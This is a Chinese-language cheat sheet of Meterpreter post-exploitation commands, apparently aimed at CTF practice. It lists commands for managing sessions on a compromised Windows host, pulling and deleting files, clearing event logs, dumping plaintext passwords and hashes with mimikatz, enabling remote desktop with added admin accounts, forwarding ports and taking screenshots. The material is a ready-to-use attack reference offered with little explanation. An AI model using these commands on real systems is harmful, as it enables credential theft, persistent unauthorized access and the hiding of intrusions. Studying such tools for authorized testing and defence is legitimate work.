1、基本系统命令
sessions #sessions -h 查看帮助
sessions -i <ID值> #进入会话 -k 杀死会话
backgroud #将当前会话放置后台
run #执行模块输入run tab键按两次列出已有脚本
info #查看已有模块信息
getuid #查看权限
getpid #获取当前进程的pid
sysinfo #查看目标机系统信息
ps #查看当前活跃进程 kill<PID值> 杀死进程
idletime #查看目标机闲置时间
reboot/shutdown #重启/关机
shell #进入目标机cmd
clearav #清除windows中的应用程序日志
load/use #加载模块
2、文件命令
download #下载文件 download c:\flag.txt
upload #上传文件 uplaod flag.txt c:\flag\
cat #查看文件内容 cat flag.txt
del #删除指定文件 del c:\flag.txt
3、抓取密码
load mimikatz #加载mimikatz模块
kerberos #获取明文密码
tspkg #获取明文密码
wdigest #获取密码 跟kerberos相同
hashdump #获取哈希值
mimikatz_command -f samdump::hashes #获取哈希值
mimikatz_command -f sekurlsa::searchPasswprds #获取明文密码
4、getgui命令&enable_rdp
run getgui -h #查看帮助
run getgui -e #开启远程桌面
run getgui -u admin -p admin #添加用户
run getgui -f 1314 -e #3389端口转发为1314
run post/windows/manage/enable_rdp #开启远程桌面
run post/windows/manage/enable_rdp USERNAME=admin PASSWORD=admin #添加用户
run post/windows/manage/enable_rdp FORWARD=true LPORT=1314 #将3389端口转发到1314
5、网络命令
ipconfig/ifconfig #查看IP
netstat #查看端口
route #查看路由
getproxy #查看代理信息
6、远程桌面
enumdesktops #查看可用的桌面
getdesktop #获取当前meterpreter 关联的桌面
set_desktop #设置meterpreter关联的桌面 -h查看帮助
screenshot #截屏
use espia #或者使用espia模块截屏 然后输入screengrab
run vnc #使用vnc远程桌面连接
rdesktop #远程桌面 rdesktop +ip需要在终端输入